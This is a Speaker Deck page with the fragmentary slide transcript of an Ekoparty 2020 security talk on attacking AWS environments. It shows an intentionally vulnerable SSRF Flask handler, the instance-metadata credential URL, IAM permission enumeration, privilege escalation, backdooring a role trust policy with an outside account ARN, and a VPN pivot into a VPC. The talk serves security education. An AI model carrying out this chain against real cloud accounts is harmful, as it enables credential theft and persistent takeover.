Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Step by step AWS Cloud Hacking
Search
andresriancho
September 25, 2020
Technology
0
590
Step by step AWS Cloud Hacking
andresriancho
September 25, 2020
Tweet
Share
More Decks by andresriancho
See All by andresriancho
Step by step AWS Cloud Hacking
andresriancho
2
2.8k
Internet-Scale analysis of AWS Cognito Security
andresriancho
1
11k
Threat Modelling
andresriancho
0
1.2k
Automated Security Analysis AWS Clouds
andresriancho
1
3.1k
Injecting into URLs / Breaking URL-Encoding
andresriancho
0
210
Galería de Fallos en Unicornios
andresriancho
1
150
Esoteric Web Application Vulnerabilities
andresriancho
0
830
String Compare Timing Attacks
andresriancho
0
510
Timing Attacks
andresriancho
1
250
Other Decks in Technology
See All in Technology
GitHub Universe: Evaluating RAG apps in GitHub Actions
pamelafox
0
130
Mobbing Practices
kawaguti
PRO
3
340
Creating Intuitive Developer Tool in Swift
giginet
PRO
0
570
Mackerelが取り組むオブザーバビリティ - Mackerel Tech Day
mackerelio
0
330
CAMERA-Suite: 広告文生成のための評価スイート / ai-camera-suite
cyberagentdevelopers
PRO
3
230
ExaDB-D dbaascli で出来ること
oracle4engineer
PRO
0
3.6k
新卒1年目が向き合う生成AI事業の開発を加速させる技術選定 / ai-web-launcher
cyberagentdevelopers
PRO
3
840
Apple/Google/Amazonの決済システムの違いを踏まえた定期購読課金システムの構築 / abema-billing-system
cyberagentdevelopers
PRO
1
190
LeSSをはじめよう〜LeSSをはじめるとき、LeSSをはじめてから、知りたかったこと詰め合わせ〜
lycorptech_jp
PRO
2
210
EKS初心者が早めに知っておきたかったこと
cuorain
0
140
新卒1年目が挑む!生成AI × マルチエージェントで実現する次世代オンボーディング / operation-ai-onboarding
cyberagentdevelopers
PRO
0
100
CI/CDやテスト自動化の開発プロジェクトへの適用
megascus
3
650
Featured
See All Featured
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
43
6.6k
ReactJS: Keep Simple. Everything can be a component!
pedronauck
664
120k
Automating Front-end Workflow
addyosmani
1365
200k
How To Stay Up To Date on Web Technology
chriscoyier
788
250k
Agile that works and the tools we love
rasmusluckow
327
21k
Build The Right Thing And Hit Your Dates
maggiecrowley
32
2.4k
Fashionably flexible responsive web design (full day workshop)
malarkey
404
65k
JavaScript: Past, Present, and Future - NDC Porto 2020
reverentgeek
47
5k
Reflections from 52 weeks, 52 projects
jeffersonlam
346
20k
A Tale of Four Properties
chriscoyier
156
23k
The Pragmatic Product Professional
lauravandoore
31
6.3k
KATA
mclloyd
29
13k
Transcript
Ekoparty 2020 Andrés Riancho
2
3
None
5
need credentials • • • 6
7
IAM permissions 8
9 http://169.254.169.254/ /latest/meta-data/iam/security-credentials/ /latest/meta-data/iam/security-credentials/{role-name}
10
11 from urllib.request import urlopen from flask import request @app.route('/ssrf')
def handler(): url = request.args.get('url') return urlopen(url).read()
Instance metadata and S3 compromise
13
None
two ways to enumerate permissions IAM service In most cases
this will fail brute-force 15
Get* / List* / Describe* DryRun parameter 16
17 SUPPORTED_SERVICES = [ 'ec2', 's3' ]
18
./enumerate-iam.py
20
many things the attacker doesn't know. 21 { "Statement":[ {
"Effect":"Allow", "Action":[ "s3:*", "lambda:*", "..." ], "Resource":"*" } ] }
try to elevate privileges to a principal with full access
22 { "Statement":[ { "Effect":"Allow", "Action":[ "*", ], "Resource": "*" } ] }
Lambda function will have access to the IAM role 23
Getting * on *
None
existing trust policy in the AdminRole 26
27
28 { "Effect": "Allow", "Principal": { "AWS": "arn:aws:iam::925877178748:root" }, "Action":
"sts:AssumeRole" } { "Effect": "Allow", "Principal": { "AWS": ["arn:aws:iam::925877178748:root", "arn:aws:iam::320222540496:root"] }, "Action": "sts:AssumeRole" }
Never trust the trust policy
30 ARN for the backdoored role
None
32 most resources in the AWS account VPC is completely
isolated from the Internet
None
34 VPN between the attacker's workstation and a VPC
35
vpc-vpn-pivot
None
From zero to full pwn
None
40 • enumerate-iam • pacu • vpc-vpn-pivot Follow @AndresRiancho
None